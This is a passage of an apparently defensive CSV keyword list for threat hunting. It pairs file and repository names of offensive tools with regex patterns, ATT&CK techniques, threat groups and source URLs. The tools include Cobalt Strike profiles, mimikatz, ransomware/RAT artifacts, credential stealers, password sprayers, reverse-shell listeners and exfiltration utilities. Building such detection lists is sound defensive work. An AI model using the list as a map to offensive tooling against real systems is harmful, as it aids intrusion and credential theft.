T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quake1-info.nse*",".{0,1000}\/quake1\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quake3-info.nse*",".{0,1000}\/quake3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quake3-master-getservers.nse*",".{0,1000}\/quake3\-master\-getservers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quantloader.profile*",".{0,1000}\/quantloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/quic-go/quic-go/http3*",".{0,1000}\/quic\-go\/quic\-go\/http3.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/QuickViewAD.ps1*",".{0,1000}\/QuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*/quicserver.exe*",".{0,1000}\/quicserver\.exe.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*/r00t-3xp10it*",".{0,1000}\/r00t\-3xp10it.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/raceabrt.c*",".{0,1000}\/raceabrt\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/RagingRotator.git*",".{0,1000}\/RagingRotator\.git.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*/RagingRotator.go*",".{0,1000}\/RagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*/rahul1406/cve-2022-0847dirtypipe-exploit*",".{0,1000}\/rahul1406\/cve\-2022\-0847dirtypipe\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RAI.git*",".{0,1000}\/RAI\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/rakjong/mimikatz_bypassAV/*",".{0,1000}\/rakjong\/mimikatz_bypassAV\/.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/ramnit.profile*",".{0,1000}\/ramnit\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/random-robbie/cve-2022-23131-exp*",".{0,1000}\/random\-robbie\/cve\-2022\-23131\-exp.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" "*/Ransomware.dll*",".{0,1000}\/Ransomware\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Ransomware.exe*",".{0,1000}\/Ransomware\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/Ransomware.pdb*",".{0,1000}\/Ransomware\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/rarce.py*",".{0,1000}\/rarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*/rasman.exe*",".{0,1000}\/rasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*/RasmanPotato*",".{0,1000}\/RasmanPotato.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*/Rat_Generator*",".{0,1000}\/Rat_Generator.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - 
TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/ratankba.profile*",".{0,1000}\/ratankba\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/ratchatpt.git*",".{0,1000}\/ratchatpt\.git.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatpt.git*",".{0,1000}\/ratchatpt\.git.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.go*",".{0,1000}\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.go*",".{0,1000}\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.syso*",".{0,1000}\/ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.syso*",".{0,1000}\/ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/RationalLove.c",".{0,1000}\/RationalLove\.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rats/badrat_cs/*",".{0,1000}\/rats\/badrat_cs\/.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/rattler.git*",".{0,1000}\/rattler\.git.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*/Rattler_32.exe*",".{0,1000}\/Rattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*/Rattler_x64.exe*",".{0,1000}\/Rattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*/raw/kali/main/*",".{0,1000}\/raw\/kali\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. 
such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/raw/kali/master/*",".{0,1000}\/raw\/kali\/master\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/raw_shellcode_size.txt*",".{0,1000}\/raw_shellcode_size\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/rawrpc.py*",".{0,1000}\/rawrpc\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*/RC4BinaryEncryption.cs*",".{0,1000}\/RC4BinaryEncryption\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/RC4Payload32.txt*",".{0,1000}\/RC4Payload32\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*/rcat-v*-win-x86_64.exe*",".{0,1000}\/rcat\-v.{0,1000}\-win\-x86_64\.exe.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*/RCStep/CSSG/*",".{0,1000}\/RCStep\/CSSG\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" 
"*/rdcman.py*",".{0,1000}\/rdcman\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/RDE1.git*",".{0,1000}\/RDE1\.git.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*/rdll_template*",".{0,1000}\/rdll_template.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rdp.py*",".{0,1000}\/rdp\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/rdp_brute.git*",".{0,1000}\/rdp_brute\.git.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*/RDPassSpray.git*",".{0,1000}\/RDPassSpray\.git.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*/RDPCredentialStealer.git*",".{0,1000}\/RDPCredentialStealer\.git.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential 
